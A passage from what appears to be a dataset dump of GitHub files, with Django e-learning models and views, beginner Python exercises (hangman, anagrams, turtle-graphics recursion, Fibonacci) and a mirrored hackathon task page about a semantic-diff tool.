"text": "from django.db import models\n\n\nclass Registration(models.Model):\n \n \"\"\"docstring for registration, registration info.\"\"\"\n email = models.EmailField(max_length=254)\n password = models.CharField(max_length=60)\n phoneNumber = models.CharField(max_length=30)\n fullName = models.CharField(max_length=60)\n birthDate = models.DateField(null=True, blank=True)\n status = models.BooleanField(default=True)\n activeUser = models.BooleanField(default=0)\n # file will be saved to MEDIA_ROOT/uploads/regphoto/2015/01/30\n Profilephoto = models.FileField(upload_to='uploads/regPhotos/%Y/%m/%d/')\n creationDate = models.DateField(auto_now_add=True)\n lastModifiedDate = models.DateField(auto_now=True)\n\n def __str__(self):\n return self.email\n"
},
{
"alpha_fraction": 0.7103448510169983,
"alphanum_fraction": 0.7137930989265442,
"avg_line_length": 40.19047546386719,
"blob_id": "b2f24ea353455df27f310b777d3ffbedf4f7bfbc",
"content_id": "7eb8817af65eb0d9c1a8338b8fbada249c9a1a61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 870,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 21,
"path": "/eLearn/views/subscribers.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import SiteSubscribers\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef editSubscribers(request):\n if request.method == 'POST':\n newTeamMember = SiteSubscribers()\n newTeamMember.email = request.POST.get('email')\n newTeamMember.status = True if request.POST.get('active') else False\n newTeamMember.save()\n return redirect(reverse('eLearn:elearn.home'))\n elif request.method == 'GET':\n pass\n if SiteSubscribers.objects.all():\n subscribers = SiteSubscribers.objects.all()\n else:\n subscribers=[]\n return redirect(reverse('eLearn:elearn.admin'), {'subscribers':subscribers})#render(request, 'elearn.home', {'subscribers':subscribers})\n \n"
},
{
"alpha_fraction": 0.602721095085144,
"alphanum_fraction": 0.6557823419570923,
"avg_line_length": 44.9375,
"blob_id": "f060b7f6b062af67d7fb5bed6a455303972a0c21",
"content_id": "05fee33622e52c8e478de10ae60d47af67ea6f86",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "permissive",
"max_line_length": 191,
"num_lines": 16,
"path": "/eLearn/views/home.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration, HaederSlider\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\ndef index(request):\n if HaederSlider.objects.all():\n a = HaederSlider.objects.all()\n b=[]\n for i in a:\n b.append(i.pic.url)\n data = {'url0': b[0], 'url1': b[1], 'url2': b[2], 'url3': b[3]}\n else:\n data = {'url0': 'http://placekitten.com/g/300/200', 'url1': 'http://placekitten.com/g/300/200', 'url2': 'http://placekitten.com/g/300/200', 'url3': 'http://placekitten.com/g/300/200'}\n return render(request,'home/index.html', {'data':data})\n"
},
{
"alpha_fraction": 0.7323943376541138,
"alphanum_fraction": 0.7605633735656738,
"avg_line_length": 34.5,
"blob_id": "032df1c2fb339e9c98ea8c298b9585b37df1fc8e",
"content_id": "4bbeeb8256358230524dcf2a8e246da31551f370",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 213,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 6,
"path": "/eLearn/models/systemSettings.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass SystemSettings(models.Model):\n\t\"\"\"docstring for SystemSettings, Mail setting and others\"\"\"\n\tkey = models.CharField(max_length = 200)\n\tvalue = models.CharField(max_length = 200)\n"
},
{
"alpha_fraction": 0.552293598651886,
"alphanum_fraction": 0.5834862589836121,
"avg_line_length": 43.18918991088867,
"blob_id": "ff3e57df493cf511edff43e09e65b4cf1bcf3fdb",
"content_id": "20acf64881db33151f8def9dd950af5612303b2f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1635,
"license_type": "permissive",
"max_line_length": 195,
"num_lines": 37,
"path": "/eLearn/views/rotator.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from eLearn.models import Registration, HaederSlider\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.urls import reverse\n\n\ndef saveRotator(request):\n names = ['1st_slide','2nd_slide','3rd_slide','4th_slide']\n if request.method == 'POST':\n if HaederSlider.objects.all():\n st = HaederSlider.objects.get(name=names[0])\n nd = HaederSlider.objects.get(name=names[1])\n rd = HaederSlider.objects.get(name=names[2])\n th = HaederSlider.objects.get(name=names[3]) \n st.pic = request.FILES[names[0]]\n nd.pic = request.FILES[names[1]]\n rd.pic = request.FILES[names[2]]\n th.pic = request.FILES[names[3]]\n st.save()\n nd.save()\n rd.save()\n th.save()\n else:\n for n in names:\n HaederSlider.objects.create(name = n,pic = request.FILES[n])\n return redirect(reverse('eLearn:elearn.admin'))\n elif request.method == 'GET':\n if HaederSlider.objects.all():\n a = HaederSlider.objects.all()\n b=[]\n for i in a:\n b.append(i.pic.url)\n data = {'url0': b[0], 'url1': b[1], 'url2': b[2], 'url3': b[3]}\n else:\n data = {'url0': 'http://placekitten.com/g/300/200', 'url1': 'http://placekitten.com/g/300/200', 'url2': 'http://placekitten.com/g/300/200', 'url3': 'http://placekitten.com/g/300/200'}\n return render(request, 'admin/adminrotator/rotator.html', {'data':data})\n"
},
{
"alpha_fraction": 0.7410468459129333,
"alphanum_fraction": 0.7603305578231812,
"avg_line_length": 39.33333206176758,
"blob_id": "870468b3eda4b8a1ccc16b9268ee0570cc41b19c",
"content_id": "5ba38095c027eb18167e1003c2ae701f228e5479",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 363,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 9,
"path": "/eLearn/models/contactUS.py",
"repo_name": "Shehab-Magdy/Ayrid_E-Learn-master",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nclass ContactUS(models.Model):\n\t\"\"\"docstring for ContactUS, visitors messages throw contact us page\"\"\"\n\tfirstName = models.CharField(max_length = 60)\n\tlastName = models.CharField(max_length = 60)\n\temail = models.EmailField(max_length = 254)\n\tmessage = models.TextField(null = True)\n\treplyStatus = models.BooleanField(default = True)\n"
}
] | 24 |
zackerman24/Battleship-Simulator | https://github.com/zackerman24/Battleship-Simulator | 01e5b5b38bc7e9015d9598f3d101c99e632e183f | 3f29187d7d0f6b854f9df49a852d3a906c302f1b | 300f670dc6f2f584d98da368c7bdb7869221ea21 | refs/heads/master | 2020-07-19T11:07:25.677858 | 2019-09-23T01:14:32 | 2019-09-23T01:14:32 | 206,437,079 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5993788838386536,
"alphanum_fraction": 0.6257764101028442,
"avg_line_length": 31.21666717529297,
"blob_id": "50f1031193e2719589178443b4e09a934c5ce1d1",
"content_id": "3e25028c27f7ee0770141832581d650e01e6d626",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1932,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 60,
"path": "/tbd.py",
"repo_name": "zackerman24/Battleship-Simulator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 4 20:12:40 2019\n\n@author: Zackerman24\n\"\"\"\n\nimport numpy as np\nimport game_setup as gs\n\n\"\"\"There's probably a way of creating six separate lists for each letter\n and then combining them into one array. Look into this after?\"\"\"\n\nbase_array = np.array([['A1', 'A2', 'A3', 'A4', 'A5', 'A6'],\n ['B1', 'B2', 'B3', 'B4', 'B5', 'B6'],\n ['C1', 'C2', 'C3', 'C4', 'C5', 'C6'], \n ['D1', 'D2', 'D3', 'D4', 'D5', 'D6'],\n ['E1', 'E2', 'E3', 'E4', 'E5', 'E6'],\n ['F1', 'F2', 'F3', 'F4', 'F5', 'F6']])\n\nplayer_one_ships_array = np.copy(base_array)\nplayer_two_ships_array = np.copy(base_array)\nplayer_one_placements = []\nplayer_two_placements = []\n\nprint(\"\\nAt any point in play, enter 'Exit' to exit the game.\")\n\nprint(\"\\nPlayer One select first. Place coordinates on your map.\")\nprint(player_one_ships_array)\ngs.create_ships(base_array,player_one_ships_array,player_one_placements)\n\nprint(\"\\nPlayer Two now selects. Place coordinates on your map.\")\nprint(player_two_ships_array)\ngs.create_ships(base_array,player_two_ships_array,player_two_placements)\n\nwhile True:\n print(\"\\nPlayer One's turn.\")\n gs.player_move(base_array,player_two_ships_array,player_two_placements)\n print(\"\\nPlayer Two's turn.\")\n gs.player_move(base_array,player_one_ships_array,player_one_placements)\n \n if not player_one_placements:\n break\n \n elif not player_two_placements:\n break\n \n else:\n continue\n\nexit()\n\n\"\"\"\nShips will be represented in each player's array as X's\nEach player will also have a 'targets' array, tracking their moves\nWhen a player enters a move, it will reference the original array\n to identify the index location of the guess, and then search\n the opposing player's array at that spot to see if it has struck\n\"\"\""
},
{
"alpha_fraction": 0.8111110925674438,
"alphanum_fraction": 0.8111110925674438,
"avg_line_length": 44,
"blob_id": "c05770be7fea24478e75d4743a723765e2032aab",
"content_id": "ee6ad1aa06f4620176a5b64a445246bbd45bf496",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 2,
"path": "/README.md",
"repo_name": "zackerman24/Battleship-Simulator",
"src_encoding": "UTF-8",
"text": "# Battleship-Simulator\nSimple way to play Battleship with a friend on one local computer.\n"
},
{
"alpha_fraction": 0.5643796324729919,
"alphanum_fraction": 0.5766252279281616,
"avg_line_length": 34.375797271728516,
"blob_id": "f44395e5cec63bdbf25ba66075f5c09832ac5d01",
"content_id": "68e9c826c5bf869dba2e799a77f0961a76f1d8ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5553,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 157,
"path": "/game_setup.py",
"repo_name": "zackerman24/Battleship-Simulator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 17:44:53 2019\n\n@author: Zackerman24\n\"\"\"\n\n\"\"\"For checking correct coord entry, could make sure entry is in\nA - F and 1-6\"\"\"\n\"\"\"Shave off extra space on any user input\"\"\"\n\"\"\"Make sure coordinate entries are unique, not duplicative\"\"\"\n\nimport numpy as np\n\ndef create_battleship(game_array, player_array, player_placements):\n \"\"\"Creates a user's 4-coordinate long battleship.\"\"\"\n \n coordinates = input((\"\\nEnter four adjacent coordinates for your Battleship\"\n \", separated by a space: \"))\n \n split_coord = coordinates.split()\n \n while True:\n if coordinates.upper() == \"EXIT\":\n exit()\n elif len(split_coord) != 4:\n print(\"Invalid coordinate entry. Please try again.\")\n coordinates = input((\"\\nEnter four adjacent coordinates\"\n \"for your Battleship\"\n \", separated only by a space: \"))\n split_coord = coordinates.split()\n continue\n else:\n break\n \n placements = []\n \n for coord in split_coord:\n raw_spot = np.where(game_array == coord)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n placements.append(spot)\n \n for place in placements:\n place_1 = place[0]\n player_placements.append(player_array[place_1[0],place_1[1]])\n player_array[place_1[0],place_1[1]] = 'BS'\n \n print(player_array)\n \ndef create_cruiser(game_array, player_array, player_placements):\n \"\"\"Creates a user's 3-coordinate long cruiser.\"\"\"\n \n coordinates = input((\"\\nEnter three adjacent coordinates for your Cruiser\"\n \", separated by a space: \"))\n \n split_coord = coordinates.split()\n \n while True:\n if coordinates.upper() == \"EXIT\":\n exit()\n elif len(split_coord) != 3:\n print(\"Invalid coordinate entry. Please try again.\")\n coordinates = input((\"\\nEnter three adjacent coordinates\"\n \"for your Cruiser\"\n \", separated only by a space: \"))\n split_coord = coordinates.split()\n continue\n else:\n break\n \n placements = []\n \n for coord in split_coord:\n raw_spot = np.where(game_array == coord)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n placements.append(spot)\n \n for place in placements:\n place_1 = place[0]\n player_placements.append(player_array[place_1[0],place_1[1]])\n player_array[place_1[0],place_1[1]] = 'CR'\n \n print(player_array)\n\ndef create_destroyer(game_array, player_array, player_placements):\n \"\"\"Creates a user's 2-coordinate long destroyer.\"\"\"\n \n coordinates = input((\"\\nEnter two adjacent coordinates for your Destroyer\"\n \", separated by a space: \"))\n \n split_coord = coordinates.split()\n \n while True:\n if coordinates.upper() == \"EXIT\":\n exit()\n elif len(split_coord) != 2:\n print(\"\\nInvalid coordinate entry. Please try again.\")\n coordinates = input((\"\\nEnter two adjacent coordinates\"\n \"for your Destroyer\"\n \", separated only by a space: \"))\n split_coord = coordinates.split()\n continue\n else:\n break\n \n placements = []\n \n for coord in split_coord:\n raw_spot = np.where(game_array == coord)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n placements.append(spot)\n \n for place in placements:\n place_1 = place[0]\n player_placements.append(player_array[place_1[0],place_1[1]])\n player_array[place_1[0],place_1[1]] = 'DT'\n \n print(player_array)\n\ndef create_ships(game_array, player_array, player_placements):\n \"\"\"Function to create all three of a players ships.\"\"\"\n \n create_battleship(game_array, player_array, player_placements)\n create_cruiser(game_array, player_array, player_placements)\n create_destroyer(game_array, player_array, player_placements)\n \ndef player_move(game_array, opponent_array, opponent_placements):\n \"\"\"Allows a player to enter an attack coordinate.\"\"\"\n \n attack = input(\"\\nEnter the coordinate you'd like to attack:\")\n \n if attack.upper() == \"EXIT\":\n exit()\n \n\n if attack in opponent_placements:\n raw_spot = np.where(game_array == attack)\n spot = list(zip(raw_spot[0],raw_spot[1]))\n attack_coordinate = spot[0]\n if opponent_array[attack_coordinate[0],attack_coordinate[1]] == \"BS\":\n print(\"\\nSuccess! You've hit your opponent's battleship.\")\n elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == \"CR\":\n print(\"\\nSuccess! You've hit your opponent's cruiser.\")\n elif opponent_array[attack_coordinate[0],attack_coordinate[1]] == \"DT\":\n print(\"\\nSuccess! You've hit your opponent's destroyer.\")\n else:\n print(\"We're not sure what you hit!\") \n opponent_placements.remove(attack)\n if not opponent_placements:\n print(\"\\nCongratulations! You destroyed all your opponent's ships.\")\n print(\"The game will now shutdown.\")\n exit()\n else:\n print(\"Your opponent only has \" + str(len(opponent_placements)) + \" spots left.\")\n else:\n print(\"Oops! Your attack did not strike any ships.\")"
}
] | 3 |
jnajman/hackaton | https://github.com/jnajman/hackaton | 2932a1fce888caf00d91e3a7cbe482d7fd556f23 | 9f568323b0d67ce50913fb5f2f81ce1aee5004ad | 190546b5ef8ad70bc53479dd626966711873b30f | refs/heads/master | 2020-07-04T02:13:59.289284 | 2016-11-20T17:35:55 | 2016-11-20T17:35:55 | 74,197,157 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6136523485183716,
"alphanum_fraction": 0.6228008270263672,
"avg_line_length": 22.700000762939453,
"blob_id": "6d1cb210de8c0d36b63fef99e8d9d9c33f691a7e",
"content_id": "f612a04e071bfb63906e6c6deab9f83fa13dd5e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1421,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 60,
"path": "/05_hangman/05_hangman_01.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n# define a function for generating a random word\ndef choose_word():\n return('abc')\n\ndef disp_word(word,guessed_letters):\n hidden_word=list(word)\n print(' '.join(hidden_word))\n for i in range(len(hidden_word)):\n if guessed_letters[hidden_word[i]]==0:\n hidden_word[i]='_'\n print(' '.join(hidden_word))\n\ndef word_complete(word,guessed_letters):\n cntr=0\n for i in range(len(word)):\n if guessed_letters[word[i]] == 0:\n cntr+=1\n return cntr\n\n\nword = choose_word()\n\n# main loop\nnum_of_trials=3\ntrial_no=1\nguessed_letters_dict=dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\ngame_end=0\n\nwhile (trial_no<num_of_trials) and (game_end==0):\n # print out current state of the game\n # for example - We're guessing the word: _ _ _ _ _ _ _ _ _ _\n print('-Kolo '+str(trial_no)+' z '+str(num_of_trials)+'-')\n\n # for example - We're guessing the word: _ _ _ _ _ _ _ _ _ _\n disp_word(word,guessed_letters_dict)\n\n\n # let's get a letter from the user\n letter = input(\"Guess the letter: \")\n\n # make sure the letter is only one character\n # TODO\n\n # print the letter to see if everything is ok by now\n print(\"You guessed\", letter)\n\n\n # determine if the letter is in the word\n if letter in word:\n guessed_letters_dict[letter]=1\n\n if word_complete(word,guessed_letters_dict)>0:\n game_end=1\n\n\n\n\nprint('konec')"
},
{
"alpha_fraction": 0.511878490447998,
"alphanum_fraction": 0.536414384841919,
"avg_line_length": 65.4051742553711,
"blob_id": "981d70bca80b336ecac40925c3507c2c36ccb703",
"content_id": "fcadfc82ec1da7dc3bb2eaaba975ab514dff197c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7705,
"license_type": "no_license",
"max_line_length": 533,
"num_lines": 116,
"path": "/hackaton_web/hack.engeto.com/tasks/semanticdiff.html",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "<html lang=\"en\">\n \n<!-- Mirrored from hack.engeto.com/tasks/semanticdiff by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:26 GMT -->\n<!-- Added by HTTrack --><meta http-equiv=\"content-type\" content=\"text/html;charset=UTF-8\" /><!-- /Added by HTTrack -->\n<head>\n <meta charset=\"utf-8\">\n <title>Task: Semantic diff</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n <link href=\"../css/bootstrap.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/themify-icons.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/flexslider.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/lightbox.min.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/ytplayer.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/theme.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href=\"../css/custom.css\" rel=\"stylesheet\" type=\"text/css\" media=\"all\" />\n <link href='http://fonts.googleapis.com/css?family=Lato:300,400%7CRaleway:100,400,300,500,600,700%7COpen+Sans:400,500,600' rel='stylesheet' type='text/css'>\n </head>\n <body>\n <div class=\"main-container\">\n <section class=\"page-title page-title-4\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-md-6\">\n <h3 class=\"uppercase mb0\">Task: Semantic diff</h3>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section class=\"pt0 pb40\">\n <div class=\"container\">\n <div class=\"row\">\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Level:</span>\n <h6 class=\"uppercase mb0\">Advanced</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Time allocation:</span>\n <h6 class=\"uppercase mb0\">2 days</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Lines of code:</span>\n <h6 class=\"uppercase mb0\">1000+</h6>\n </div>\n <div class=\"col-sm-3 col-xs-6 mb-xs-24\">\n <span>Category:</span>\n <h6 class=\"uppercase mb0\">Tool</h6>\n </div>\n </div>\n <!--end of row-->\n </div>\n <!--end of container-->\n </section>\n <section>\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Description</h4>\n <p>\nEveryone knows the <b>diff</b> tool, right? The old-school utility taking two files on input and producing how the two files differ from each other. Together with another old-school utility, <b>patch</b>, it pretty much enabled distributed, collaborative software development.<br/> \n\nBut comparing source code as text should not be the end of it. Python code has rules and structure. It has entities like modules, classes and methods. It is possible to compare two versions of a Python project as programs, not as text, taking into account the semantics of the code. Which modules, classes or methods were changed, which were added, removed or moved around. What changed in the entities: were interfaces or contracts changed, or just implementation? Was is core of the program, or some weird, rarely used plugin?<br/>\n\nThe goal of this project is to produce a tool that understand Python code and is able to semantically compare two Python program versions (like a baseline and a pull request).\n </p>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">How to start</h4>\n <p>\nPrograms are trees (ASTs) and there are good tools that can read Python into ASTs for you already (<a href=\"https://pypi.python.org/pypi/astroid\">astroid</a>). Simple semantic diff is probably a tree graph difference problem, for which there might be some nice solutions already in some graph library. Then it’s mostly a matter of determining what changes to look for, what to do with them and how to present them. Plus dealing with pseudo-differences like moving code around, renaming etc.\n </p>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Further ideas</h4>\n <h5>Program that describes a change in a natural language, just as a programmer would</h5>\n <h5>Program that extracts semantic properties of changes, for example to create a data set describing evolution of a software project that could be analysed for insights.</h5>\n <h5>A GitHub-integrated service producing useful information for PR reviewers</h5>\n <h5>Integration with pylint that would allow pylint to focus only on the code that was changed.</h5>\n </div>\n </div>\n <!--end of row-->\n <div class=\"row mb80 mb-xs-40\">\n <div class=\"col-md-8 col-md-offset-2 col-sm-10 col-sm-offset-1\">\n <h4 class=\"uppercase\">Random resources and inspiration</h4>\n <h5 class=\"uppercase\"><a href=\"https://www.semanticmerge.com/\">Semantic merge</a></h5>\n <h5 class=\"uppercase\"><a href=\"http://stackoverflow.com/questions/523307/semantic-diff-utilities\">StackOverflow discussion</a></h5>\n <h5 class=\"uppercase\"><a href=\"https://github.com/yinwang0/psydiff\">psydiff</a></h5>\n <h5 class=\"uppercase\"><a href=\"https://yinwang0.wordpress.com/2012/01/03/ydiff/\">ydiff</a></h5>\n </div>\n </div>\n <!--end of row-->\n </section>\n </div>\n <script src=\"../js/jquery.min.js\"></script>\n <script src=\"../js/bootstrap.min.js\"></script>\n <script src=\"../js/flickr.html\"></script>\n <script src=\"../js/flexslider.min.js\"></script>\n <script src=\"../js/lightbox.min.js\"></script>\n <script src=\"../js/masonry.min.js\"></script>\n <script src=\"../js/twitterfetcher.min.js\"></script>\n <script src=\"../js/spectragram.min.js\"></script>\n <script src=\"../js/ytplayer.min.js\"></script>\n <script src=\"../js/countdown.min.js\"></script>\n <script src=\"../js/smooth-scroll.min.js\"></script>\n <script src=\"../js/parallax.js\"></script>\n <script src=\"../js/scripts.js\"></script>\n </body>\n\n<!-- Mirrored from hack.engeto.com/tasks/semanticdiff by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 20 Nov 2016 09:37:26 GMT -->\n</html>\n"
},
{
"alpha_fraction": 0.5938123464584351,
"alphanum_fraction": 0.6077844500541687,
"avg_line_length": 24.075000762939453,
"blob_id": "267445628dfd15c8d2bdac3bd290014b9e3ef90e",
"content_id": "f2e8186892b1c7369336a085029deb208c882c99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 40,
"path": "/04_anagrams/04_anagrams_01.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "try:\n f=open(\"words.txt\",'r')\n dictionary = f.read().splitlines()\n # print(f.readlines())\n # print(dictionary)\n\n myword='tea'\n\n # print(len(dictionary[20]))\n # print(dictionary[12359])\n # alph_dict = dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\n # print(alph_dict)\n\n\n # print(dictionary[0][3])\n\n myword_len=len(myword)\n # print(myword_len)\n\n myword_alph_dict=dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\n # print(myword_alph_dict.keys())\n\n for i in range(myword_len):\n myword_alph_dict[myword[i]] += 1\n\n # print(myword_alph_dict)\n\n\n dictionary_len=len(dictionary)\n\n for j in range(dictionary_len):\n if myword_len==len(dictionary[j]):\n newword_alph_dict = dict.fromkeys('abcdefghijklmnopqrstuvwxyz', 0)\n for k in range(len(dictionary[j])):\n newword_alph_dict[dictionary[j][k]] += 1\n if myword_alph_dict==newword_alph_dict:\n print(dictionary[j])\n\nfinally:\n f.close()"
},
{
"alpha_fraction": 0.6251851916313171,
"alphanum_fraction": 0.6622222065925598,
"avg_line_length": 18.014083862304688,
"blob_id": "00d1bbd2552698704a794b6881a07bd33f750db8",
"content_id": "5a5604534a7242f519e9b33ed98ed9fccd2c68db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1350,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 71,
"path": "/03_recursion/03_draw_01_nautilus.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "'''\nIn this exercise, you'll understand the concepts of recursion using selected programs - Fibonacci sequence, Factorial and others. We will also use Turtle graphics to simulate recursion in graphics.\n\nFactorial\nFibonacci\nGreatest common divisor\n\nOnce we understand the principles of recursion, we can do fun stuff with Turtle graphics and DRAW:\n\na square\na nautilus\na spiral\na circles (many circles)\na hexagram\na Koch star\na snowflake\na tree\n'''\n# ------------------\n#turtle\n# ------------------\n\nimport turtle\nfrom math import cos,sin\nfrom math import radians as deg2rad\nfrom math import degrees as rad2deg\n\ndef F(n):\n if n == 0: return 0\n elif n == 1: return 1\n else: return F(n-1)+F(n-2)\n\nm=13\n# turtle.shape('turtle')\nturtle.forward(F(m))\nturtle.left(90)\n\nfor j in range(m,0,-1):\n a=F(j)\n zlomy=5\n angle1=90/(zlomy+1)\n d=2*a*sin(deg2rad(angle1/2))\n turn_angle=(angle1/2)\n\n\n for i in range(0,zlomy+1):\n turtle.left(turn_angle)\n turtle.forward(d)\n turtle.left(angle1/2)\n\nturtle.exitonclick()\n\n\n\n# a=200\n# zlomy=20\n# angle1=90/(zlomy+1)\n# d=2*a*sin(deg2rad(angle1/2))\n# turn_angle=(angle1/2)\n#\n#\n# turtle.forward(a)\n# turtle.left(90)\n#\n# for i in range(0,zlomy+1):\n# turtle.left(turn_angle)\n# turtle.forward(d)\n# turtle.left(angle1/2)\n#\n# # turtle.shape('turtle')\n# turtle.exitonclick()\n"
},
{
"alpha_fraction": 0.6283857226371765,
"alphanum_fraction": 0.6522210240364075,
"avg_line_length": 21.536584854125977,
"blob_id": "6554c99947fa4199f06d77f91367e39662c684ed",
"content_id": "cfdbb67a7bd180a2b294ca177f7a7db6836405e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "no_license",
"max_line_length": 197,
"num_lines": 41,
"path": "/03_recursion/03_recursion_02_fibonacci.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "'''\nIn this exercise, you'll understand the concepts of recursion using selected programs - Fibonacci sequence, Factorial and others. We will also use Turtle graphics to simulate recursion in graphics.\n\nFactorial\nFibonacci\nGreatest common divisor\n\nOnce we understand the principles of recursion, we can do fun stuff with Turtle graphics and DRAW:\n\na square\na nautilus\na spiral\na circles (many circles)\na hexagram\na Koch star\na snowflake\na tree\n'''\n# ------------------\n#fibonacci\n# ------------------\n\n# def fibo3(num_1,num_2,counter,length):\n# if counter==length:\n# print(num_2)\n# return num_2\n# else:\n# counter+=1\n# return fibo3(num_2,num_1+num_2,counter,length)\n#\n# fibo_in=input('zadej delku fibonacciho rady (vetsi nez 2): ')\n# # print(fact_in)\n# fibo3(1,1,2,int(fibo_in))\n\n\ndef F(n):\n if n == 0: return 0\n elif n == 1: return 1\n else: return F(n-1)+F(n-2)\n\nprint(F(8))"
},
{
"alpha_fraction": 0.45952415466308594,
"alphanum_fraction": 0.48134592175483704,
"avg_line_length": 55.373016357421875,
"blob_id": "b5a84cf6c02a358bdbe6c030ab069a00063203e1",
"content_id": "8754317a34ff4dcc19ae4361515451542f8f5139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7103,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 126,
"path": "/hackaton_web/hack.engeto.com/tasks/tictactoe.html",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
